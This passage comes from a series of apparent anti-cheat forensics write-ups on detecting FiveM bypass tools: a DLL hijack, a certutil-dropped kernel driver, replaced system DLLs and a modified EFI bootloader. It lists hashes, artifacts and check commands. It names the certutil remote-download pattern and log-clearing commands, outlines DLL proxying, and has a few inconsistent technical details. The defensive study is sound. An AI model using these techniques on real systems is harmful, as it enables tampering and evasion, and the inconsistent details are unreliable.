Lasso (or one of its dependencies) imports one or more of these functions, causing Windows to search for and load the DLL at startup. The bypass author writes a DLL that exports all required function names — forwarding each call through to the legitimate System32 copy via load-time forwarding or runtime GetProcAddress — while also executing its own initialization code in DllMain when the DLL is first mapped. The critical detection artifact from this mechanism is that the hijack DLL must exist on disk in the application directory at the time of Process Lasso startup. Unlike injection techniques that write a payload to a temporary location and then delete it, the DLL must remain on disk persistently to be loaded on every Process Lasso start. Even after the bypass operator "destructs" their session, the file must be physically present for future use — guaranteeing a recoverable on-disk artifact at the known path. Screenshare Check Methodology ----------------------------- 1 ### List Process Lasso directory contents Open a Command Prompt (elevated) and run dir "C:\\Program Files\\Process Lasso\\" (adjust for the actual installation path if different). Share the output on screen. Look for profapi.dll in the listing. Its mere presence in this directory is the primary indicator — document the file size and date shown. 2 ### Hash the directory-local profapi.dll Run certutil -hashfile "C:\\Program Files\\Process Lasso\\profapi.dll" SHA256 on screen. Compare against the known malicious hash 6ce7c98b...ff8. Submit to VirusTotal live for multi-vendor detection results. Then run the same hash command against C:\\Windows\\System32\\profapi.dll and show both hashes side by side to confirm they differ. 3 ### System Informer module list check If Process Lasso is currently running, open System Informer as administrator, find the ProcessLasso process, go to Properties → Modules. Sort by path. Show the load path for profapi.dll on screen. If it reads from the Process Lasso install directory rather than System32, the hijack DLL is actively loaded in memory right now. 4 ### Journal Trace DLL creation entry Run Journal Trace or fsutil usn readjournal C: csv > journal.csv. Filter the output for profapi.dll events within the Process Lasso directory path. The USN record will show when the file was created there, independent of any NTFS metadata that could have been altered. Present this timestamp alongside the BAM or Prefetch execution timeline for the bypass installer. 5 ### Verify no legitimate reason for directory-local profapi.dll Check the official Process Lasso release notes and file manifest on Bitsum's website to confirm that no released version of Process Lasso ships with a bundled profapi.dll. This establishes that the file has no legitimate provenance in that location regardless of what the user claims about its origin. The only supported source for profapi.dll is a Windows installation. Detection Notes --------------- DLL search order hijacking is one of the most reliable persistence mechanisms for bypass detection because it requires a file to remain on disk permanently. Unlike injection techniques that can operate entirely in memory, the hijack DLL at C:\\Program Files\\Process Lasso\\profapi.dll cannot be removed by the bypass at runtime without breaking its own loading mechanism. This gives investigators a guaranteed on-disk artifact to recover and hash. The Alt+F12 hotkey trigger design means that in a screenshare context, the bypass DLL may be loaded in Process Lasso memory even if the FiveM-side injection has not yet been activated. Investigators should always check the System Informer module list while Process Lasso is running — the DLL is already present in memory from startup regardless of whether the hotkey has been pressed. The specific SHA-256 hash 6ce7c98b384dbe444a916e7e6580288549eca501315114916c1ee1908b5afff8 applies to this build. As with all cheat tooling, developers may recompile to rotate hashes. Location-based detection — any non-System32 profapi.dll in an application directory — is the more durable signal and should be the primary detection criterion in all cases. --- # Shitty Bypass: Kernel Driver Dropped via certutil to System32 | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Shitty Bypass: Kernel Driver Dropped via certutil to System32 ============================================================= Shitty Bypass uses `certutil.exe` — a Windows built-in Living Off the Land Binary — to download a kernel driver (`info.sys`, with a `cum.sys` variant also observed) directly into `C:\Windows\System32`. This is among the most-detected LOLBAS download patterns in existence. The certutil command-line, including the full download URL, survives in DiagTrack service artifacts even after process termination, providing durable forensic evidence. FiveMBypass DetectionKernel Drivercertutil LOLBASDiagTrack Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Shitty Bypass employs `certutil.exe` — a certificate management utility included in every modern Windows installation — as a file downloader to fetch a kernel driver and write it to `C:\Windows\System32`. The technique exploits the `certutil -urlcache -split -f ` invocation pattern, which downloads an arbitrary remote file without triggering Windows SmartScreen or requiring elevated download prompts on misconfigured systems. The primary driver artifact is named `info.sys` (SHA-256: `2bd3e29013ca7115eac06b9c6993789fd577d572365b3590f26f07188dddd1ea`). A variant with the filename `cum.sys` has also been observed using the same delivery technique with a different payload binary. Legitimate kernel drivers in System32 are always digitally signed by their vendor and by Microsoft WHQL — an unsigned driver in this location is an immediate red flag. From an OPSEC standpoint, the naming choices are self-defeating and the delivery method is one of the most-detected LOLBAS patterns documented by the security community. DiagTrack (Connected User Experiences and Telemetry service) logs process command-line arguments including the full `certutil` invocation, which persists in its database even after `certutil.exe` has exited and the driver file has been deleted. Primary IOCs ------------ 1 ### info.sys in C:\\Windows\\System32 Navigate to `C:\Windows\System32` and search for `info.sys` and `cum.sys`. These filenames do not belong to any legitimate Windows component. Right-click any found file and check its digital signature — legitimate drivers are signed; the bypass driver is unsigned. Presence alone is a strong positive IOC. 2 ### SHA-256 hash of info.sys If `info.sys` is found, compute its SHA-256 hash: run `certutil -hashfile C:\Windows\System32\info.sys SHA256` in an elevated Command Prompt. A result matching `2bd3e29013ca7115eac06b9c6993789fd577d572365b3590f26f07188dddd1ea` is a definitive match. Any non-matching hash on a file named `info.sys` in System32 is still suspicious and warrants investigation. Proof Screenshots [Proof 1 ↗](https://ibb.co/GV8QmGX) [Proof 2 ↗](https://ibb.co/SxLPvd3) [Proof 3 ↗](https://ibb.co/PhK6NgX) [Proof 4 ↗](https://ibb.co/rt3cd1k) [Proof 5 ↗](https://ibb.co/r7H4z7R) 3 ### DiagTrack artifact showing certutil command-line The DiagTrack service writes process telemetry including full command-line arguments to `C:\ProgramData\Microsoft\Diagnosis\ETLLogs\AutoLogger\` and associated SQLite databases. Use a DiagTrack parser or WxTCmd to query the telemetry database for `certutil` entries. The recovered record will include the download URL and output path (`C:\Windows\System32\info.sys`), providing the staging server hostname as a network IOC even if the file has since been deleted. 4 ### certutil.exe in BAM/Prefetch records Open WinPrefetchView and locate `CERTUTIL.EXE-*.pf`. The last execution timestamp and the referenced file paths listed in the Prefetch entry will corroborate when the download occurred. Additionally, check the Background Activity Monitor (BAM) registry key at `HKLM\SYSTEM\CurrentControlSet\Services\bam\State\UserSettings\` for a `certutil.exe` last execution entry under the relevant SID. 5 ### cum.sys variant search Run a filesystem search for `cum.sys` across all drives: `where /r C:\ cum.sys` in an elevated Command Prompt. This variant uses the same certutil LOLBAS delivery and drops to System32. If found, apply the same hash verification and DiagTrack forensics as for `info.sys`. The presence of either filename in System32 with no Microsoft signature is conclusive. cum.sys Proof Screenshots [Proof 1 ↗](https://ibb.co/bPM3rW3) [Proof 2 ↗](https://ibb.co/XbCVWB0) [Proof 3 ↗](https://ibb.co/T8qMSPD) [Proof 4 ↗](https://ibb.co/4Znj0Qk) certutil as a Downloader — DiagTrack Forensics ---------------------------------------------- `certutil.exe` has been documented as a LOLBAS downloader since at least 2017. The standard invocation `certutil -urlcache -split -f ` downloads a remote file over HTTP or HTTPS and writes it to the specified output path. Crucially, certutil also writes a copy of downloaded content to the URL cache directory (`%LOCALAPPDATA%\Microsoft\Windows\INetCache\`), leaving a second copy of the payload even if the primary drop path is cleaned. The DiagTrack service (also known as Connected User Experiences and Telemetry, or UTC) runs continuously and records process creation events including command-line arguments to its own telemetry store. Unlike Windows Event Logs, which are frequently targeted by cleanup scripts via `wevtutil cl`, the DiagTrack telemetry store is a separate database that most bypass authors do not target for cleanup. The data persists until DiagTrack rotates its logs on its own schedule. To access DiagTrack artifacts, investigators can use Eric Zimmermann's WxTCmd tool to parse the `Windows.db` telemetry database found in `C:\ProgramData\Microsoft\Diagnosis\`. The parsed output will include timestamped process creation records with full command-line arguments, making it straightforward to reconstruct the certutil download invocation and extract the staging URL. Screenshare Check Methodology ----------------------------- 1 ### System32 driver search Ask the subject to open an elevated Command Prompt and run `dir C:\Windows\System32\info.sys C:\Windows\System32\cum.sys 2>nul`. Any output listing the file confirms presence. Follow up with `certutil -hashfile C:\Windows\System32\info.sys SHA256` if found. The subject cannot meaningfully fake this output in real-time. 2 ### Driver signature check Ask the subject to open PowerShell and run `Get-AuthenticodeSignature C:\Windows\System32\info.sys | Select-Object Status, SignerCertificate`. A legitimate driver returns `Valid` with a recognizable publisher. An unsigned bypass driver returns `NotSigned` or `UnknownError`. This check is fast and unambiguous. 3 ### certutil Prefetch timestamp Open WinPrefetchView on the subject's machine. Sort by Last Run Time. A recent `CERTUTIL.EXE` Prefetch entry — particularly one close to a game session or near suspicious activity timestamps — corroborates the download event. Ask the subject to scroll through the list live on screenshare. 4 ### INetCache review Ask the subject to open `%LOCALAPPDATA%\Microsoft\Windows\INetCache\` in File Explorer with hidden files shown. certutil writes downloaded content here. Sort by date modified and look for any `.sys`, `.exe`, or other executable files that certutil may have cached during the download operation. 5 ### Autoruns driver check Open Autoruns (Sysinternals) and navigate to the Drivers tab. Filter for entries without a Microsoft or trusted vendor signature. Any unsigned driver entry, particularly one with a suspicious name or a System32 path, should be flagged. Autoruns color-codes unverified entries in yellow, making them immediately visible. Detection Notes --------------- **certutil downloading to System32 is a tier-1 detection rule** in every major EDR and SIEM platform. Windows Defender, CrowdStrike, SentinelOne, and Carbon Black all flag this pattern out of the box. The bypass author's choice to use certutil for kernel driver delivery represents a fundamental misunderstanding of operational security — or a deliberate disregard for it. DiagTrack artifacts are the most durable forensic evidence for this bypass. Even if the actor deletes `info.sys`, wipes Prefetch, and clears Event Logs, the DiagTrack database preserves the full certutil command-line including the staging URL. Investigators should always query DiagTrack before concluding that an actor has successfully cleaned up. The INetCache artifact provides an additional recovery path: certutil's URL cache copy of the downloaded driver may survive even if the primary `C:\Windows\System32\info.sys` has been deleted. Hash the cached copy to confirm it matches the known bypass driver SHA-256. --- # Farbenbomber Bypass: PcaSVC & Prefetch Execution Artifacts | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Farbenbomber Bypass: PcaSVC & Prefetch Execution Artifacts ========================================================== Farbenbomber ("color bomber" in German) is a FiveM bypass executable with SHA-256 `af10429b...b860b` and a DPS first-seen timestamp of 2025/10/15. Despite anti-forensic design intent, execution artifacts survive across multiple independent sources: a PcaSVC entry at offset `0x494000`, Windows Prefetch records, NTFS Journal Trace, and System Informer process logs — each providing an independent confirmation path. FiveMBypass DetectionPcaSVCPrefetchIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Farbenbomber.exe is a FiveM bypass loader whose German-language filename — translating to "color bomber" — is consistent with a pattern of German-language naming conventions observed in several bypass tools in this research series, suggesting development within a German-speaking community or deliberate use of German strings as an obfuscation signal. The binary carries SHA-256 `af10429bea0dff14ad9c452d01b6950cd648a8c6b8f91b9fe9a2388bef8b860b`. The DPS (Diagnostic Policy Service) first-seen timestamp of **2025/10/15** anchors the earliest known in-the-wild deployment of this build. DPS records application execution metadata independently of Event Log state, providing a reliable first-seen date even after standard log clearing. Despite apparent anti-forensic design intent (likely including attempts to delete the executable after execution and clear standard evidence sources), Farbenbomber leaves artifacts in at least four independent locations: the PcaSVC (Program Compatibility Assistant Service) database at offset `0x494000`, Windows Prefetch files, the NTFS USN Journal Trace, and System Informer's process and module history logs. The redundancy of these artifact sources means that clearing any one or two of them is insufficient to eliminate all evidence of execution. Primary IOCs ------------ 1 ### SHA-256 hash identification If the binary is still present on disk, compute its SHA-256: `certutil -hashfile SHA256`. A result matching `af10429bea0dff14ad9c452d01b6950cd648a8c6b8f91b9fe9a2388bef8b860b` is a definitive identification of this specific build. Search common staging paths: `%TEMP%`, `%APPDATA%`, `%USERPROFILE%\Downloads`, and any game-adjacent directories. The binary may have been renamed after initial drop. 2 ### DPS timestamp 2025/10/15 Query the DPS database using a DPS parser (available in KAPE or as a standalone tool). The DPS (Diagnostic Policy Service) records first-execution metadata for executables that trigger compatibility checks. Farbenbomber.exe will appear with a first-seen entry timestamped **2025/10/15**. This timestamp persists independently of Prefetch, Event Logs, and filesystem timestamps, making it valuable as a corroboration source when other artifacts have been tampered with. 3 ### PcaSVC entry at 0x494000 The Program Compatibility Assistant Service (PcaSVC) maintains a database of executed programs for compatibility tracking. Use PcaClient or a hex editor to inspect the PcaSVC database file at `C:\Windows\AppCompat\Programs\`. The Farbenbomber.exe entry is recorded at binary offset `0x494000` within the PcaAppLaunchDic.bin or associated database file. This artifact records the executable path, the first execution timestamp, and the originating user SID. 4 ### Prefetch record in WinPrefetchView Open WinPrefetchView (NirSoft). Search for `FARBENBOMBER.EXE-*.pf`. The Prefetch file records the executable hash, last run time, run count, and the list of files and DLLs accessed during execution. The DLL list in the Prefetch entry will reveal which system libraries the bypass loader imported, providing additional intelligence on its execution method. If the Prefetch file has been deleted, check the NTFS Journal for a deletion record of the `.pf` file itself. 5 ### Journal Trace confirmation Use MFTECmd or a USN Journal parser to query for file system operations involving `Farbenbomber.exe`. The Journal will record: file creation (when the binary was written to disk), any rename operations (if the actor renamed it to evade detection), and file deletion (if it was cleaned up post-execution). The Journal Trace timestamps are independent of the file's NTFS timestamps (`$STANDARD_INFORMATION`), which can be timestomped. Journal records are significantly harder to retroactively modify. 6 ### System Informer process and module records System Informer (formerly Process Hacker) maintains a log of all process creation and termination events in its event log if the logging feature was active. Navigate to **View → Event Log** within System Informer. Search for `Farbenbomber`. If the bypass was executed while System Informer was running in the background — which it often is on monitored gaming systems — its process creation record will appear here with the full executable path, PID, parent PID, and creation timestamp. Screenshare Check Methodology ----------------------------- 1 ### Prefetch check via WinPrefetchView Ask the subject to open WinPrefetchView on their system. Sort the entries by Last Run Time descending. Ask them to use the search function (`Ctrl+F`) and search for `farbenbomber`. Any result confirms execution of the bypass. Ask them to scroll the entry into full view so the last run time and run count are visible on screenshare. 2 ### System Informer event log review Ask the subject to open System Informer and navigate to View → Event Log. Use the filter or search to look for any process named `Farbenbomber` or containing German-language strings. Ask them to also check the process tree for any recently terminated processes with no identifiable parent. System Informer process records persist across sessions if the log has not been manually cleared. 3 ### Filesystem search for the binary Ask the subject to open an elevated Command Prompt and run `where /r C:\ Farbenbomber.exe 2>nul`. Also run `dir /S /B C:\Users\%USERNAME%\AppData\*.exe | findstr /i farben 2>nul` to catch any copies in the user profile. If the binary has been renamed, the Prefetch file (which uses the original name at execution time) and the SHA-256 hash of any found executables remain the primary identification methods. 4 ### AppCompat / RecentFileCache check Ask the subject to open an elevated Command Prompt and run `reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache"`. The AppCompatCache (ShimCache) records executables that have been executed or accessed. Ask the subject to pipe the output to a file and review it, or use AppCompatCacheParser to produce a readable CSV. A `Farbenbomber.exe` entry in ShimCache is an independent corroboration of execution. 5 ### Recent files and startup entry check Ask the subject to open Autoruns (Sysinternals) and check all tabs — particularly **Scheduled Tasks**, **Services**, and **Logon** — for any entry referencing `Farbenbomber` or an unrecognized executable in a user-writable path. Then ask them to open `%APPDATA%\Microsoft\Windows\Recent\` in File Explorer and check for any shortcut pointing to the bypass executable path, which would indicate the file was accessed directly from a folder rather than launched programmatically. Detection Notes --------------- **PcaSVC and DPS are the most durable artifact sources for Farbenbomber.** Bypass authors who clear Prefetch files and Event Logs frequently overlook the Program Compatibility Assistant database and the Diagnostic Policy Service records, both of which operate in the background and are not targeted by standard evidence-wiping scripts. The specific PcaSVC offset `0x494000` provides a precise location for investigators parsing the database manually. The DPS first-seen timestamp of 2025/10/15 is significant for timeline reconstruction: any system claiming no exposure to bypass tools that shows a Farbenbomber DPS entry cannot credibly have that entry from a source other than direct execution. DPS records are created on first execution and do not update on subsequent runs, making the 2025/10/15 date the floor for when this build was released into circulation. Investigators using System Informer should ensure that KSystemInformer (the kernel driver component) was loaded during the session in question, as this extends the observable process data beyond what user-mode monitoring alone can capture. Process records from kernel-mode monitoring are significantly harder for bypass tools to suppress retroactively than user-mode event logs. --- # No Trace Bypass: Oversized mycomput.dll in Computer Management | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 No Trace Bypass: Oversized mycomput.dll in Computer Management ============================================================== No Trace Bypass plants a malicious replacement for `mycomput.dll` — the legitimate Computer Management host DLL — that is approximately 145 times larger than the authentic file (~18,000 KB vs ~124 KB). The bypass is triggered by the `Win+X` then `F7` keyboard sequence, which opens Computer Management and causes the oversized DLL to be loaded. File size alone is sufficient to flag this bypass without requiring hash computation. FiveMBypass Detectionmycomput.dllDLL Size AnomalyComputer Management Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- `mycomput.dll` is the DLL that implements the Computer Management snap-in host (`compmgmt.msc`). On a stock Windows 11 installation, the legitimate file is located at `C:\Windows\System32\mycomput.dll` and has a size of approximately 124 KB. The No Trace Bypass replaces this file with a malicious DLL of approximately 18,000 KB (18 MB) — 145 times the legitimate size — which bundles the bypass loader alongside stub implementations of the legitimate exports. The bypass is activated by the `Win+X` keyboard shortcut (opens the Quick Access menu in Windows 11) followed by pressing `F7`, which selects Computer Management from the menu. When `compmgmt.msc` launches, the Microsoft Management Console loads `mycomput.dll` from System32, at which point the bypass DLL executes its loader payload. The use of a Windows built-in shortcut to trigger injection is intended to make the activation sequence appear innocuous on a screenshare. Despite the "No Trace" branding, the size anomaly is immediately visible without any forensic tooling — File Explorer shows the file size in the details pane. A 18 MB `mycomput.dll` cannot be disguised or explained away as a legitimate Windows component, making this one of the most straightforward detections documented in this research series. Primary IOCs ------------ 1 ### mycomput.dll file size check Navigate to `C:\Windows\System32` in File Explorer. Locate `mycomput.dll`. Right-click → Properties → General tab. The **Size** field should read approximately `124 KB` (the exact value varies slightly by Windows build — typical range 120–128 KB). If the size reads anything near `18,000 KB` or `18 MB`, the bypass DLL is present. This single check is definitive and requires no additional tooling. 2 ### SHA-256 hash comparison For conclusive identification, compute the SHA-256 of the suspect file: run `certutil -hashfile C:\Windows\System32\mycomput.dll SHA256` in an elevated Command Prompt. The bypass DLL SHA-256 is `f07de2eb82878d89e6851b5c6434638049467f1c343bcacc287037f621e5a494`. A hash match confirms the specific No Trace bypass version. Any non-matching hash on a file of anomalous size is still a strong positive IOC warranting escalation. 3 ### DLL path verification The legitimate `mycomput.dll` is only present in `C:\Windows\System32\` and, on 64-bit systems with 32-bit compatibility, potentially in `C:\Windows\SysWOW64\`. Run `where mycomput.dll` in a Command Prompt to list all instances. Additional copies in unexpected locations (user profile directories, AppData, game directories) indicate DLL search order hijacking or staging of the replacement file prior to installation. 4 ### Journal Trace creation event for oversized mycomput.dll Use NTFS Journal analysis (e.g., MFT Explorer or KAPE with the NTFS collection module) to query the USN Journal for change records on `mycomput.dll`. A creation or modification record on this file with a timestamp that does not correspond to a Windows Update is an IOC. The timestamp will indicate when the bypass DLL was written to disk, which can be cross-referenced with logon events and game session timestamps. 5 ### Win+X menu usage in LastActivityView Open LastActivityView (NirSoft). Filter for `compmgmt.msc` or `mmc.exe` launch events. A recent execution of Computer Management — particularly one occurring during or immediately before a game session — indicates that the bypass activation sequence was used. Cross-reference the MMC launch timestamp with the MFT record modification timestamp on `mycomput.dll` to establish the injection trigger timeline. Size-Based DLL Detection ------------------------ File size is one of the most underutilized IOC types in bypass detection, yet for DLL replacement attacks it is frequently definitive. Legitimate Windows system DLLs are compiled by Microsoft and their sizes are stable across systems running the same Windows build — they do not vary by user configuration or installed software. A malicious replacement DLL that bundles additional code (a bypass loader, packed payload, or embedded resources) will almost always be substantially larger than the file it replaces. The 145× size discrepancy in this case (124 KB → 18,000 KB) is among the most extreme examples encountered in FiveM bypass analysis. It reflects a design choice to embed a large payload directly inside the DLL rather than fetching it at runtime — a tradeoff that makes network forensics harder but makes file-level detection trivially easy. For server administrators building detection playbooks, maintaining a reference table of expected sizes for commonly targeted system DLLs is a high-value, low-cost defensive measure. The following DLLs are frequently targeted and have stable, well-documented sizes on stock Windows installations: * `mycomput.dll` — ~124 KB (Computer Management snap-in) * `ntdll.dll` — ~2.1 MB (varies slightly by build) * `kernel32.dll` — ~700–800 KB * `user32.dll` — ~1.4–1.6 MB Any system DLL that deviates significantly from its expected size — without a corresponding Windows Update installation event — should be considered a candidate for DLL replacement investigation. Screenshare Check Methodology ----------------------------- 1 ### File Explorer size check — live view Ask the subject to open File Explorer, navigate to `C:\Windows\System32`, type `mycomput` in the search box, and right-click the result to open Properties. The Size field must show approximately 124 KB. Ask the subject to read the size aloud or zoom in so it is clearly visible on screenshare. A value near 18,000 KB or 18 MB is an immediate positive IOC. 2 ### Hash verification in elevated Command Prompt Ask the subject to open an elevated Command Prompt and run `certutil -hashfile C:\Windows\System32\mycomput.dll SHA256`. The output hash should be compared against the known-good value for the installed Windows build (obtainable from the Microsoft Symbol Server or a clean reference system). A match to `f07de2eb82878d89e6851b5c6434638049467f1c343bcacc287037f621e5a494` confirms the bypass DLL. 3 ### Signature check via PowerShell Ask the subject to run `Get-AuthenticodeSignature C:\Windows\System32\mycomput.dll | Select-Object Status, SignerCertificate`. The legitimate DLL is signed by Microsoft. The bypass DLL may be unsigned or signed with an invalid or untrusted certificate. A `NotSigned` or `HashMismatch` result on a System32 DLL is definitive evidence of tampering. 4 ### SysWOW64 check for 32-bit variant Ask the subject to run `dir C:\Windows\SysWOW64\mycomput.dll`. On most 64-bit Windows systems, this file does not exist in SysWOW64 (Computer Management is a 64-bit application). If found in SysWOW64 with an anomalous size, it indicates the bypass has also targeted 32-bit MMC scenarios. Document the size and hash of both copies if present. 5 ### MMC recent execution check Ask the subject to open WinPrefetchView and scroll to `MMC.EXE-*.pf`. Check the last run time. Ask them to also open LastActivityView and filter for `mmc`. A recent execution timestamp — particularly one aligned with a game session — combined with the oversized DLL confirms that the injection trigger was used. The combination of artifact presence and trigger evidence constitutes a complete IOC chain. Detection Notes --------------- **The file size check alone is sufficient to confirm this bypass.** No advanced tooling is required — File Explorer, PowerShell's `Get-Item`, or a single `dir` command will expose the anomaly. The "No Trace" name is aspirational; this bypass leaves a highly visible artifact in one of the most stable, well-characterized locations on a Windows system. Investigators should also check whether `Windows Resource Protection` (SFC — System File Checker) would detect the replacement. SFC maintains hashes of protected system files in a cache (`C:\Windows\System32\catroot`). Running `sfc /verifyonly` in an elevated Command Prompt will report integrity violations for a replaced `mycomput.dll` without making any changes, providing an additional confirmation method. After detection and removal, the legitimate `mycomput.dll` can be restored by running `sfc /scannow` in an elevated Command Prompt, which will replace the tampered file with the cached genuine version from the Windows Component Store (`C:\Windows\WinSxS`). --- # Aqua EFI Bypass: Modified Bootloader Running Before Windows | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Aqua EFI Bypass: Modified Bootloader Running Before Windows =========================================================== Aqua EFI Bypass replaces the legitimate `bootx64.efi` bootloader on the EFI System Partition with a modified version (SHA-256: `91d9db5f...cbd5`). Because the modified bootloader executes before the Windows kernel initializes, standard Windows-level anti-cheat mechanisms cannot inspect or detect it during the boot sequence. Detection requires direct inspection of the EFI System Partition and mandates that Secure Boot be verified as enabled. FiveMBypass DetectionEFI BootloaderPre-OS BypassSecure Boot Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- The EFI System Partition (ESP) is a dedicated FAT32 partition present on all UEFI-based systems. It contains the bootloader chain that the system firmware reads before any operating system code runs. On Windows systems, the standard bootloader is `bootx64.efi`, located at `\EFI\Microsoft\Boot\bootmgfw.efi` (with a secondary copy at `\EFI\Boot\bootx64.efi` for fallback booting). The Aqua EFI Bypass replaces one or both of these files with a modified EFI executable. Because the modified bootloader runs before Windows begins initializing, anti-cheat software that operates entirely within the Windows kernel — including kernel-mode drivers that load at early boot — does not have an opportunity to observe or interrupt the bypass component. The bypass establishes its foothold in the system firmware execution chain, then allows a normal-appearing Windows boot to proceed. **Secure Boot is the primary countermeasure.** When Secure Boot is enforced, the UEFI firmware verifies the cryptographic signature of each bootloader before executing it. An unsigned or incorrectly signed modified `bootx64.efi` will cause the boot to fail with a Secure Boot violation. This bypass therefore requires that Secure Boot be disabled on the target system. A Secure Boot status of _disabled_ or _not supported_ during a screenshare check is itself a significant IOC. Primary IOCs ------------ 1 ### Mount EFI system partition Open an elevated Command Prompt. Run `mountvol X: /S` to mount the EFI System Partition to drive letter X (choose any unused letter). Then run `dir X:\EFI\` to list the EFI directory tree. If `mountvol` fails, use `diskpart`: type `diskpart`, then `list vol` to identify the ESP volume, `select vol `, and `assign letter=X`. 2 ### Hash bootx64.efi against known-good value After mounting, run `certutil -hashfile X:\EFI\Boot\bootx64.efi SHA256`. Compare the output against the known-good SHA-256 for your Windows version and build. The Aqua bypass bootloader has SHA-256 `91d9db5fbf3c89b0df5d674f0e367afd3ac9e45ff1c13040ee2279cf3314cbd5`. Any hash mismatch against a known-good reference is a positive IOC. Also check `X:\EFI\Microsoft\Boot\bootmgfw.efi`. 3 ### SHA-256 and SHA-1 comparison Run both: `certutil -hashfile X:\EFI\Boot\bootx64.efi SHA256` and `certutil -hashfile X:\EFI\Boot\bootx64.efi SHA1`. The bypass bootloader SHA-1 is `d8fca4d3fa670c6d54fc274a0625cd4bad2016ab`. Cross-referencing both hashes against the known IOC values eliminates any ambiguity from hash algorithm selection. A match on either confirms the bypass file. 4 ### Secure Boot status check Run `msinfo32` (System Information). In the right pane, locate **Secure Boot State**. A value of `Off` or `Unsupported` is required for this bypass to function and is itself a significant IOC on a gaming system. Alternatively, open Settings → System → Recovery → Advanced startup → Restart now → Troubleshoot → Advanced options → UEFI Firmware Settings to inspect the Secure Boot configuration directly in firmware. 5 ### EFI partition file listing for unexpected files After mounting, run `dir /S X:\EFI\` to enumerate all files on the ESP. A legitimate Windows ESP will contain a small set of known files under `EFI\Microsoft\Boot\` and `EFI\Boot\`. Look for any additional `.efi` executables, unexpected subdirectories, or files with anomalous modification timestamps. Some EFI bypass implementations place additional loader components alongside the modified bootloader. EFI System Partition Inspection ------------------------------- The EFI System Partition is hidden from normal File Explorer browsing and is not assigned a drive letter by default. It is only accessible via elevated Command Prompt using `mountvol` or `diskpart`. The partition is formatted as FAT32 and is typically 100–260 MB in size on a Windows 11 system. A legitimate Windows 11 ESP contains the following key files and directories under the `\EFI` root: * `\EFI\Boot\bootx64.efi` — fallback UEFI bootloader, signed by Microsoft * `\EFI\Microsoft\Boot\bootmgfw.efi` — Windows Boot Manager, signed by Microsoft * `\EFI\Microsoft\Boot\BCD` — Boot Configuration Data store * `\EFI\Microsoft\Recovery\BCD` — Recovery BCD A modified `bootx64.efi` will typically have a significantly different file size from the legitimate version (Microsoft's signed bootloader for Windows 11 is approximately 1.1–1.3 MB depending on the build). The bypass EFI binary may be smaller (containing only the bypass loader) or larger (if it bundles additional components). File size alone — combined with a failed hash check — is sufficient to flag the file for further investigation. After completing inspection, unmount the ESP: in elevated Command Prompt run `mountvol X: /D` (or use diskpart `remove letter=X`) to restore the hidden state of the partition. Screenshare Check Methodology ----------------------------- 1 ### Verify Secure Boot status via msinfo32 Ask the subject to press `Win+R`, type `msinfo32`, and press Enter. Direct them to scroll to **Secure Boot State** in the System Summary pane. The result must read `On`. If it reads `Off` or the field is absent, that is a mandatory escalation point. Secure Boot disabled is a prerequisite for EFI bootloader bypass. 2 ### Mount and list ESP contents Ask the subject to open an elevated Command Prompt and run `mountvol Z: /S && dir Z:\EFI\`. Verify that the only subdirectories under `EFI` are the expected `Boot` and `Microsoft` folders (and any OEM entries like `EFI\ubuntu` if dual-booting, which should be disclosed). Any unknown `.efi` files are an immediate IOC. 3 ### Hash the bootx64.efi file live With the ESP still mounted to Z:, ask the subject to run `certutil -hashfile Z:\EFI\Boot\bootx64.efi SHA256`. Record the output hash. Cross-reference against the known IOC hash `91d9db5fbf3c89b0df5d674f0e367afd3ac9e45ff1c13040ee2279cf3314cbd5`. A match is definitive. A mismatch against a known-good build hash is equally actionable. 4 ### Check bootmgfw.efi signature Ask the subject to run `certutil -hashfile Z:\EFI\Microsoft\Boot\bootmgfw.efi SHA256`. This is the primary Windows Boot Manager and a second replacement target. Compare against known-good values for the installed Windows build. Both `bootx64.efi` and `bootmgfw.efi` should be checked since some bypass implementations target one or both. 5 ### Unmount ESP and verify BIOS boot order After inspection, ask the subject to unmount via `mountvol Z: /D`. Then ask them to open msinfo32 and confirm the **BIOS Mode** is `UEFI`. A system reporting `Legacy` (CSM/MBR boot) warrants separate investigation as it indicates the system is not using UEFI boot at all, which precludes Secure Boot enforcement entirely. Detection Notes --------------- **Secure Boot enforcement eliminates this class of bypass entirely.** Server administrators should consider making Secure Boot status a requirement for participation. A player presenting with Secure Boot disabled and no legitimate dual-boot or Linux rationale has no credible excuse on a system intended solely for gaming. The SHA-256 and SHA-1 hashes documented here are for the specific bypass sample analyzed. Actors may produce new builds of the modified bootloader; in those cases, a hash-based positive identification will not match, but a mismatch against the legitimate Microsoft-signed bootloader hash for the installed Windows build remains a valid IOC. Always maintain a reference database of legitimate bootloader hashes per Windows build for comparison. Investigators should be aware that certain legitimate software (BitLocker with custom TPM configurations, some hardware vendor OEM entries) can add files to the ESP. These should be identifiable by their vendor certificates and known file sizes. The presence of unsigned or anomalously-sized EFI binaries with no legitimate vendor explanation is the definitive flag. --- # Sulution Software Bypass: Three Build Variants with March 2026 Timestamps | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Sulution Software Bypass: Three Build Variants with March 2026 Timestamps ========================================================================= "Sulution" — the vendor's own misspelling of Solution — shipped three distinct binary builds within a 48-hour window in March 2026, each carrying traceable DPS timestamps and unique SHA-256 hashes. Rapid iteration across builds is a deliberate evasion strategy; this report documents all three variants with full hash sets and unified detection guidance. FiveMBypass DetectionMulti-BuildDPS TimestampIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- "Sulution Software" — the vendor apparently did not notice the typo in their own product name, which tells you something about the QA process — is a FiveM bypass operation that distinguishes itself primarily by the speed at which it iterates builds. Three distinct compiled variants appeared within a 48-hour window between March 18 and March 20, 2026. Each build carries a unique SHA-256 hash, MD5, and Digital Signature Timestamp (DPS), but all three share structural characteristics that allow unified detection. The rapid build cadence is not accidental. When a bypass is detected and its hash is added to a blocklist — 